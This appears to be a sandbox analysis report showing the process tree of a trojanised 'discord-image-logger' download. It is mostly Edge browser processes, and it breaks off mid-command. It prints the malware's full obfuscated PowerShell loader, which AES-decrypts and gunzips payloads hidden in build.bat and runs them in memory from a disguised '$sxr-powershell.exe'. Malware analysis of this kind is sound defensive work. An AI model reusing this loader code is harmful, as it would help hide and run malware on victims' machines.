C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3416
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3524 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://youtube.com2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff764a46f8,0x7fff764a4708,0x7fff764a47183⤵PID:3360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:23⤵PID:3184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:4556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2960 /prefetch:83⤵PID:3576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:13⤵PID:4200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:13⤵PID:4856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:13⤵PID:3100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:13⤵PID:1384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5116 /prefetch:83⤵PID:2268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5368 /prefetch:83⤵PID:4256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:83⤵PID:1196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:2140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:13⤵PID:2568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:13⤵PID:3340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:13⤵PID:1828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:13⤵PID:2932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:13⤵PID:3712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:13⤵PID:904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:13⤵PID:3316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:13⤵PID:2928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:13⤵PID:3180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2116 /prefetch:13⤵PID:1096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:13⤵PID:3704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:13⤵PID:2928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:13⤵PID:3828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5604 /prefetch:83⤵PID:5108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:13⤵PID:5032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6344 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:1340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5244 /prefetch:23⤵PID:5572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=904 /prefetch:13⤵PID:7076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4004 /prefetch:83⤵PID:7088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:13⤵PID:6240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 /prefetch:83⤵PID:5824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=180 /prefetch:83⤵PID:6244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1720 /prefetch:13⤵PID:6340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2504 /prefetch:13⤵PID:5568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:13⤵PID:6808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4136 /prefetch:83⤵PID:6304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3384 /prefetch:83⤵PID:6952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,3415244983767355265,16131574331020775100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:13⤵PID:1276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat" "2⤵
- Drops file in Windows directory
PID:1976 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1728
-
-
C:\Windows\system32\net.exenet session3⤵PID:448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:1812
-
-
-
C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat.exe"build.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function iwkhR($DITIA){ $XVnki=[System.Security.Cryptography.Aes]::Create(); $XVnki.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XVnki.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XVnki.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8ehdS6ppW71xL6mDjAeXsyQHYKmv0CPtd6Kn4aXzt4='); $XVnki.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hx3HwApb8t08fxY/Go7cSw=='); $LrZFK=$XVnki.CreateDecryptor(); $return_var=$LrZFK.TransformFinalBlock($DITIA, 0, $DITIA.Length); $LrZFK.Dispose(); $XVnki.Dispose(); $return_var;}function kOuIB($DITIA){ $DbpkU=New-Object System.IO.MemoryStream(,$DITIA); $qZtjl=New-Object System.IO.MemoryStream; $JMgSB=New-Object System.IO.Compression.GZipStream($DbpkU, [IO.Compression.CompressionMode]::Decompress); $JMgSB.CopyTo($qZtjl); $JMgSB.Dispose(); $DbpkU.Dispose(); $qZtjl.Dispose(); $qZtjl.ToArray();}function ZkZVP($DITIA,$AoxAJ){ $HLgZK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$DITIA); $UXpIZ=$HLgZK.EntryPoint; $UXpIZ.Invoke($null, $AoxAJ);}$zVdRm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\build.bat').Split([Environment]::NewLine);foreach ($BYfmw in $zVdRm) { if ($BYfmw.StartsWith(':: ')) { $Rndkm=$BYfmw.Substring(3); break; }}$FMGlq=[string[]]$Rndkm.Split('\');$IgKIL=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[0])));$voFjb=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[1])));ZkZVP $voFjb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZkZVP $IgKIL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:700 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create(); $VbRCn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VbRCn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VbRCn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='); $VbRCn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ=='); $nMOmr=$VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')(); $WZWky=$nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmAux, 0, $RmAux.Length); $nMOmr.Dispose(); $VbRCn.Dispose(); $WZWky;}function SPSlI($RmAux){ $qrnaZ=New-Object System.IO.MemoryStream(,$RmAux); $RJeXu=New-Object System.IO.MemoryStream; $eBeQA=New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::Decompress); $eBeQA.CopyTo($RJeXu); $eBeQA.Dispose(); $qrnaZ.Dispose(); $RJeXu.Dispose(); $RJeXu.ToArray();}function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}$VbRCn1 = New-Object System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$MSWRP = $VbRCn1.('rotpyrceDetaerC'[-1..-15] -join '')();$NUNZn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iZ8jPKmNkFdL1A6USwSGLA==');$NUNZn = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn, 0, $NUNZn.Length);$NUNZn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn);$cBXxm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=');$cBXxm = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBXxm, 0, $cBXxm.Length);$cBXxm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cBXxm);$GlTUf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2/VItTApDmqYld7UNbITmw==');$GlTUf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlTUf, 0, $GlTUf.Length);$GlTUf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GlTUf);$YQTnf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7u8mHn+uE8DouxrXvlfhI8HvaFVabiSu9wW1NQnVBW3d+pbXbyeWiMzHsShgQVzWTccLy3R/sL1Fgo2ngbj1Xyhdd8QHKlT7xJYowF1jSmMT/YNyn61oZ4EBOdIILtHY76iwoY89T/0NXOlbVQSqG6f76Tvu+/ljtRIjK68ygJujUjyjF9W1UFNXnjlbvKaQ0BTSj7AUpwYBspcSQUSWqlV4JZYmfkLzrzzafMFwHzW6zgfk8rU5wxN2vDnC7yji58n7rylZaggz4+okuyhoMrfM4k/T/mqHJ8VdUFO8xpIeX3hePuaZ5Z58y1CyCEoFhGVyjfm3AnZl3fgFnvsWSS15RXMq5KXGV3I38NkazdqvV05jjZTTECaOwsRwu2zLdJ29XVcSC4yPm3wAT5LZe+YH34hMw11+Tv5n+xxqwY=');$YQTnf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YQTnf, 0, $YQTnf.Length);$YQTnf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YQTnf);$CPWdf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vGf9ES1PdsfKW8Swn9bI3w==');$CPWdf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CPWdf, 0, $CPWdf.Length);$CPWdf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CPWdf);$igAgV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UiHcuo7jcw/WkburfrLBQ==');$igAgV = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igAgV, 0, $igAgV.Length);$igAgV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igAgV);$ZYOXs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hDpsuPmELCzhYTCugvhrpA==');$ZYOXs = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZYOXs, 0, $ZYOXs.Length);$ZYOXs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZYOXs);$cmXWw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Duasd/EcBtQj2cZsgiwg+Q==');$cmXWw = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cmXWw, 0, $cmXWw.Length);$cmXWw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cmXWw);$qpchR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KDa4G8PrmTjfH/8cqC5WDg==');$qpchR = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qpchR, 0, $qpchR.Length);$qpchR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qpchR);$NUNZn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkNHx2c/PIn2isifrSOkpw==');$NUNZn0 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn0, 0, $NUNZn0.Length);$NUNZn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn0);$NUNZn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QCQIFS3Mnpd27lKyoiLRsA==');$NUNZn1 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn1, 0, $NUNZn1.Length);$NUNZn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn1);$NUNZn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McBhlHe8GfiHzcJuHtKawA==');$NUNZn2 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn2, 0, $NUNZn2.Length);$NUNZn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join 